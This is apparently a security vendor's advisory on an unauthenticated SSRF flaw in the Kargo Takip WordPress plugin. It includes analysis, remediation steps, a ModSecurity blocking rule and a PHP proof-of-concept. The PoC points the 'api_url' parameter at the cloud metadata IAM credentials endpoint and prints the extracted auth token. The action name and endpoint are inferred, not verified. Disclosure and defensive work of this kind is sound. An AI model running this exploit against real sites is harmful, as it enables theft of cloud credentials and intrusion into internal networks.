Atomic Edge analysis of CVE-2026-12095 (metadata-based):
This vulnerability affects the Kargo Takip plugin for WordPress, version 1.2 and earlier. It is an unauthenticated Server-Side Request Forgery (SSRF) via the ‘api_url’ parameter. The CVSS score is 7.2 (High), and the vector indicates network-based, low-complexity exploitation with no privileges required and no user interaction. The scope is changed, meaning the attack can impact resources beyond the originally vulnerable component.
The root cause (inferred from CWE-918 and the description) is the plugin’s failure to validate or sanitize the ‘api_url’ parameter before using it in a server-side HTTP request. In typical WordPress plugin patterns, this likely occurs in an AJAX handler (e.g., admin-ajax.php with an action like ‘kargo_takip_request’) or a shortcode that accepts user input and passes it to functions like wp_remote_get() or curl_exec(). The plugin also echoes the value of any ‘auth’ key found in the response JSON back to the attacker, enabling direct data exfiltration. This is confirmed by the description but not by code review.
An unauthenticated attacker can send a POST or GET request to the vulnerable endpoint (likely /wp-admin/admin-ajax.php?action=kargo_takip_request) with the ‘api_url’ parameter set to an internal service URL. For example: api_url=http://169.254.169.254/latest/meta-data/. The plugin will fetch that URL and return the ‘auth’ value from the response. The attacker captures this data in their browser. No authentication is required.
Remediation requires the plugin developer to (1) validate the ‘api_url’ parameter against a whitelist of allowed external domains/IPs, (2) block requests to private IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.169.254), and (3) restrict the output to prevent echoing arbitrary response data. Since no patch exists, users should disable the plugin or apply a WAF rule.
Impact: An attacker can query cloud instance metadata (e.g., AWS, GCP, Azure) to obtain credentials, access internal APIs or services, and potentially pivot to further exploitation of internal network resources. The ability to read ‘auth’ keys from responses could lead to authentication token theft and privilege escalation within internal systems.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-12095 (metadata-based)
# Blocks SSRF attempts via 'api_url' parameter in the inferred AJAX action 'kargo_takip_request'
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:202612095,phase:2,deny,status:403,chain,msg:'CVE-2026-12095 - SSRF via api_url in Kargo Takip',severity:'CRITICAL',tag:'CVE-2026-12095'"
SecRule ARGS_POST:action "@streq kargo_takip_request" "chain"
SecRule ARGS_POST:api_url "@rx ^https?://(127.|10.|172.1[6-9].|172.2[0-9].|172.3[0-1].|192.168.|169.254.|0.|metadata.googleapis.com|metadata.internal)"
"t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-12095 - Kargo Takip <= 1.2 - Unauthenticated Server-Side Request Forgery via 'api_url' Parameter
// Configuration: Change these values as needed
$target_url = 'http://example.com'; // Base URL of the WordPress site
$action = 'kargo_takip_request'; // Inferred AJAX action from plugin slug
$internal_url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/admin'; // Example internal metadata endpoint
// Build the request URL
$vulnerable_url = $target_url . '/wp-admin/admin-ajax.php?action=' . urlencode($action) . '&api_url=' . urlencode($internal_url);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $vulnerable_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
// Execute the request
$response = curl_exec($ch);
// Check for errors
if (curl_errno($ch)) {
echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
echo "Response from internal service:n";
echo $response . "n";
// The description indicates the plugin echoes the 'auth' key value from JSON
// We can attempt to decode if JSON
$decoded = json_decode($response, true);
if (isset($decoded['auth'])) {
echo "[Extracted Auth Token]: " . $decoded['auth'] . "n";
}
}
curl_close($ch);
?>
